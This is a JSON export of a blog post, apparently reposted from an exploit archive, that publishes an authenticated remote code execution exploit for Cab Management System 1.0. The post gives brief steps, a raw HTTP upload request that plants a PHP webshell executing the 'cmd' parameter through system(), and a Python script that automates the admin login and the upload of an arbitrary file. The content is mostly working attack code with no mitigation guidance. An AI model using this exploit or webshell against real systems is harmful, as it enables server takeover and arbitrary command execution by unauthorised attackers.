{"id":20948,"date":"2022-02-22T10:38:34","date_gmt":"2022-02-22T07:38:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166063\/cabms10-exec.txt"},"modified":"2022-02-22T11:31:15","modified_gmt":"2022-02-22T08:01:15","slug":"cab-management-system-1-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cab-management-system-1-0-remote-code-execution\/","title":{"rendered":"Cab Management System 1.0 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Cab Management System 1.0 – Remote Code Execution (RCE) (Authenticated)
\n# Exploit Author: Alperen Ergel
\n# Contact: @alpernae (IG\/TW)
\n# Software Homepage: https:\/\/www.sourcecodester.com\/php\/15180\/cab-management-system-phpoop-free-source-code.html
\n# Version : 1.0
\n# Tested on: windows 10 xammp | Kali linux
\n# Category: WebApp
\n# Google Dork: N\/A
\n# Date: 18.02.2022
\n######## Description ########
\n#
\n#
\n# Step 1: Login admin account and go settings of site
\n# Step 2: Update web site icon and selecet a webshell.php
\n# Step3 : Upload your webshell that’s it…
\n#
\n######## Proof of Concept ########<\/p>\n

========>>> START REQUEST <<<=========<\/p>\n

POST \/cms\/classes\/SystemSettings.php?f=update_settings HTTP\/1.1
\nHost: localhost
\nContent-Length: 11338
\nsec-ch-ua: “(Not(A:Brand”;v=”8″, “Chromium”;v=”98″
\nAccept: *\/*
\nContent-Type: multipart\/form-data; boundary=—-WebKitFormBoundaryc5vp1oayEolowCbb
\nX-Requested-With: XMLHttpRequest
\nsec-ch-ua-mobile: ?0
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.82 Safari\/537.36
\nsec-ch-ua-platform: “Windows”
\nOrigin: http:\/\/localhost
\nSec-Fetch-Site: same-origin
\nSec-Fetch-Mode: cors
\nSec-Fetch-Dest: empty
\nReferer: http:\/\/localhost\/cms\/admin\/?page=system_info
\nAccept-Encoding: gzip, deflate
\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
\nCookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml
\nConnection: close<\/p>\n

<– SNIPP HERE –>
\n——WebKitFormBoundaryc5vp1oayEolowCbb
\nContent-Disposition: form-data; name=”img”; filename=”shell.php”
\nContent-Type: application\/octet-stream<\/p>\n

<?php if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “<\/pre>”; die; }?>
\n——WebKitFormBoundaryc5vp1oayEolowCbb
\nContent-Disposition: form-data; name=”cover”; filename=””
\nContent-Type: application\/octet-stream
\n——WebKitFormBoundaryc5vp1oayEolowCbb–
\n<– SNIPP HERE –><\/p>\n

========>>> END REQUEST <<<=========<\/p>\n

========>>> EXPLOIT CODE <<<=========<\/p>\n

import requests
\nprint(“””
\n——————————————–
\n| |
\n| Author: Alperen Ergel (@alpernae) |
\n| |
\n| CAB Management System v1 Exploit |
\n| |
\n——————————————–
\n“””)
\nusername = input(“Username: “)
\npassword = input(“Password: “)
\nURL = input(“Domain: “)<\/p>\n

burp0_url = “http:\/\/” + URL + “\/cms\/classes\/Login.php?f=login”
\nburp0_headers = {“sec-ch-ua”: “\\”(Not(A:Brand\\”;v=\\”8\\”, \\”Chromium\\”;v=\\”98\\””, “Accept”: “*\/*”, “Content-Type”: “application\/x-www-form-urlencoded; charset=UTF-8”, “X-Requested-With”: “XMLHttpRequest”, “sec-ch-ua-mobile”: “?0”, “User-Agent”: “Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.82 Safari\/537.36”, “sec-ch-ua-platform”: “\\”Windows\\””, “Origin”: “http:\/\/192.168.1.33”, “Sec-Fetch-Site”: “same-origin”, “Sec-Fetch-Mode”: “cors”, “Sec-Fetch-Dest”: “empty”, “Referer”: “http:\/\/192.168.1.33\/cms\/admin\/login.php”, “Accept-Encoding”: “gzip, deflate”, “Accept-Language”: “tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7”, “Connection”: “close”}
\nburp0_data = {“username”: username, “password”: password}
\nrequests.post(burp0_url, headers=burp0_headers, data=burp0_data)<\/p>\n

FILE = input(“File: “)<\/p>\n

burp0_url = “http:\/\/” + URL + “\/cms\/classes\/SystemSettings.php?f=update_settings”
\nburp0_headers = {“sec-ch-ua”: “\\”(Not(A:Brand\\”;v=\\”8\\”, \\”Chromium\\”;v=\\”98\\””, “Accept”: “*\/*”, “Content-Type”: “multipart\/form-data; boundary=—-WebKitFormBoundaryc5vp1oayEolowCbb”, “X-Requested-With”: “XMLHttpRequest”, “sec-ch-ua-mobile”: “?0”, “User-Agent”: “Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.82 Safari\/537.36”, “sec-ch-ua-platform”: “\\”Windows\\””, “Origin”: “http:\/\/localhost”, “Sec-Fetch-Site”: “same-origin”, “Sec-Fetch-Mode”: “cors”, “Sec-Fetch-Dest”: “empty”, “Referer”: “http:\/\/localhost\/cms\/admin\/?page=system_info”, “Accept-Encoding”: “gzip, deflate”, “Accept-Language”: “tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7”, “Connection”: “close”}
\nburp0_data = “——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”name\\”\\r\\n\\r\\nCab Management System\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”short_name\\”\\r\\n\\r\\nCMS – PHP\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”content[welcome]\\”\\r\\n\\r\\n<ptest<\/p>\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”files\\”; filename=\\”\\”\\r\\nContent-Type: application\/octet-stream\\r\\n\\r\\n\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”content[about]\\”\\r\\n\\r\\n<ptest<\/p>\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”files\\”; filename=\\”\\”\\r\\nContent-Type: application\/octet-stream\\r\\n\\r\\n\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”img\\”; filename=\\”” + FILE + “\\”\\r\\nContent-Type: application\/octet-stream\\r\\n\\r\\n\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb\\r\\nContent-Disposition: form-data; name=\\”cover\\”; filename=\\”\\”\\r\\nContent-Type: application\/octet-stream\\r\\n\\r\\n\\r\\n——WebKitFormBoundaryc5vp1oayEolowCbb–\\r\\n”
\nrequests.post(burp0_url, headers=burp0_headers, data=burp0_data)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Cab Management System 1.0 – Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG\/TW) # Software Homepage: https:\/\/www.sourcecodester.com\/php\/15180\/cab-management-system-phpoop-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N\/A # Date: 18.02.2022 ######## Description ######## # # # …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20948","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20948","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20948"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20948\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}